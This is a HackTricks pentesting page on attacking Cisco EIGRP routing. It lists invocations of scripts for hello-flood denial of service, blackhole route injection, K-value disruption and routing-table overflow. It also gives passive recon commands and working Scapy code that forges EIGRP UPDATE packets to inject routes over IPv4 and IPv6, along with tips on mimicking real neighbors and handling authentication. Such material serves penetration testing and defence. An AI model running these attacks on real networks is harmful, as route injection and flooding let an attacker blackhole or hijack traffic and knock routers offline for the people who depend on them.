EIGRP Attacks

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

This is a summary of the attacks exposed in https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Check it for further information.

Fake EIGRP Neighbors Attack

• Objective: To overload router CPUs by flooding them with EIGRP hello packets, potentially leading to a Denial of Service (DoS) attack.
• Tool: helloflooding.py script.
• Execution:

  ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
  

• Parameters:
  • --interface: Specifies the network interface, e.g., eth0.
  • --as: Defines the EIGRP autonomous system number, e.g., 1.
  • --subnet: Sets the subnet location, e.g., 10.10.100.0/24.

EIGRP Blackhole Attack

• Objective: To disrupt network traffic flow by injecting a false route, leading to a blackhole where the traffic is directed to a non-existent destination.
• Tool: routeinject.py script.
• Execution:

  ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
  

• Parameters:
  • --interface: Specifies the attacker’s system interface.
  • --as: Defines the EIGRP AS number.
  • --src: Sets the attacker’s IP address.
  • --dst: Sets the target subnet IP.
  • --prefix: Defines the mask of the target subnet IP.

Abusing K-Values Attack

• Objective: To create continuous disruptions and reconnections within the EIGRP domain by injecting altered K-values, effectively resulting in a DoS attack.
• Tool: relationshipnightmare.py script.
• Execution:

  ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
  

• Parameters:
  • --interface: Specifies the network interface.
  • --as: Defines the EIGRP AS number.
  • --src: Sets the IP Address of a legitimate router.

Routing Table Overflow Attack

• Objective: To strain the router’s CPU and RAM by flooding the routing table with numerous false routes.
• Tool: routingtableoverflow.py script.
• Execution:

  sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
  

• Parameters:
  • --interface: Specifies the network interface.
  • --as: Defines the EIGRP AS number.
  • --src: Sets the attacker’s IP address.

Protocol Notes Useful for Attacks

• HELLO packets carry K-values and neighbors only form when they match. This is the basis for K-value mismatch/relationship disruption attacks and why mismatched K-values prevent adjacency.
• The PARAMETER TLV (Type 0x0001) in HELLO (and initial UPDATE) carries K-values and Hold Time, so passive captures reveal the exact values used on the segment.
• EIGRP uses IP protocol 88, multicasting to 224.0.0.10 in IPv4 and FF02::A in IPv6. That makes it easy to spot with tcpdump 'ip proto 88 or ip6 proto 88' before attempting active abuse.
• Reliable UPDATEs are ordered with sequence / acknowledgement fields and SEQUENCE TLVs. Blind multicast route injection can work in weak labs, but when emulating a real neighbor you often need to track seq, ack, and the peer list carried in SEQUENCE TLVs to stay in sync with the RTP logic.

Passive Recon Before Injection

Before you try to inject routes, capture a legitimate HELLO / UPDATE exchange and extract:

• AS number
• K-values and Hold Time from the PARAMETER TLV
• Authentication in use: none, MD5, or HMAC-SHA-256
• Neighbor source address and the subnet/interface where EIGRP is active
• Software / TLV profile (SOFTWARE_VERSION, STUB, SEQUENCE) so your crafted packets look like the local routers

Useful commands:

# Passive sniffing
sudo tcpdump -ni eth0 'ip proto 88 or ip6 proto 88'

# Quick discovery and route enumeration on IPv4
sudo nmap --script broadcast-eigrp-discovery

# If you already know the AS
sudo nmap --script broadcast-eigrp-discovery --script-args broadcast-eigrp-discovery.as=100

Nmap’s broadcast-eigrp-discovery works by sending a HELLO to 224.0.0.10 and parsing the returned UPDATE packets, which is useful to enumerate prefixes before attempting a more intrusive route injection.

Scapy Packet Crafting (Route Injection / Fake Neighbors)

Scapy ships an EIGRP contrib layer with TLVs like EIGRPParam and EIGRPIntRoute, which is enough to craft UPDATEs for route injection. Example adapted from the davidbombal/scapy EIGRP route injection script:

from scapy.all import *
load_contrib("eigrp")

sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
      EIGRP(opcode="Update", asn=100, seq=0, ack=0,
            tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
                                   nexthop="192.168.1.248")]))

The same repo includes quick “fake neighbor” scripts that sniff a real EIGRP packet and replay it with a spoofed source IP to create phantom neighbors (useful for CPU/neighbor-table pressure).

Scapy also exposes primitives that are useful when you need higher-fidelity emulation instead of a single UPDATE:

• EIGRPAuthData for authenticated adjacencies
• EIGRPSeq for sequence / conditional-receive handling
• EIGRPStub to mirror observed stub behavior
• EIGRPv6IntRoute / EIGRPv6ExtRoute for IPv6 route injection

That matters because the reliable transport logic is often what separates a throwaway PoC from a fake neighbor that survives long enough to learn routes and poison the topology.

EIGRP for IPv6

EIGRP for IPv6 is a separate address-family transported over IPv6. It still uses EIGRP packet format / TLVs, but it is enabled directly on interfaces and multicasts to FF02::A. From an offensive perspective, that means a dual-stack segment may expose an EIGRP attack surface even when the IPv4 side looks clean.

Important differences:

• IPv6 EIGRP is enabled per interface (ipv6 eigrp <as>), not with IPv4-style network statements.
• A router ID is still required, so sniffing an active segment usually reveals enough context to mimic a valid peer.
• MD5 authentication exists for EIGRP for IPv6, and modern named mode deployments may also use HMAC-SHA-256, which blocks unauthenticated route injection.

Minimal Scapy example for IPv6 route injection:

from scapy.all import *
load_contrib("eigrp")

send(IPv6(src="fe80::250:56ff:feaa:1111", dst="ff02::a") /
     EIGRP(opcode="Update", asn=100, seq=0, ack=0,
           tlvlist=[EIGRPv6IntRoute(dst="2001:db8:dead:beef::",
                                    prefixlen=64,
                                    nexthop="fe80::250:56ff:feaa:1111")]),
     iface="eth0")

If the IPv6 next hop inside the route TLV is zeroed, receivers fall back to the IPv6 source address in the packet header. That makes source spoofing and correct link-local addressing especially important during EIGRPv6 testing.

• Scapy EIGRP contrib docs: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
• Example scripts: https://github.com/davidbombal/scapy

Routopsy & NSE Helpers

• Routopsy builds a virtual-router attack lab (FRRouting + Scapy) and includes DRP attacks you can adapt for EIGRP tests. https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
• Nmap’s NSE has a small eigrp library for parsing/generating a subset of EIGRP packets. https://nmap.org/nsedoc/lib/eigrp.html

Authentication Recon

• EIGRP named mode supports HMAC-SHA-256 authentication via authentication mode hmac-sha-256 .... If enabled, crafted packets must be authenticated with the correct key; if not enabled, spoofing/injection is easier to validate.
• RFC 7868 also defines both MD5 and SHA2-256 authentication data inside the EIGRP AUTH TLV, which is why passive captures quickly tell you whether a blind spoof is realistic or whether you first need key material.
• On EIGRP for IPv6, Cisco also supports MD5 authentication with key chains. If multiple keys with send/accept lifetimes are configured, replaying stale authenticated traffic becomes less reliable because the active key can rotate without changing the rest of the adjacency profile.

References

• https://www.rfc-editor.org/rfc/rfc7868.html
• https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_eigrp/configuration/15-mt/ire-15-mt-book/ire-sha-256.html
• https://nmap.org/nsedoc/scripts/broadcast-eigrp-discovery.html
• https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.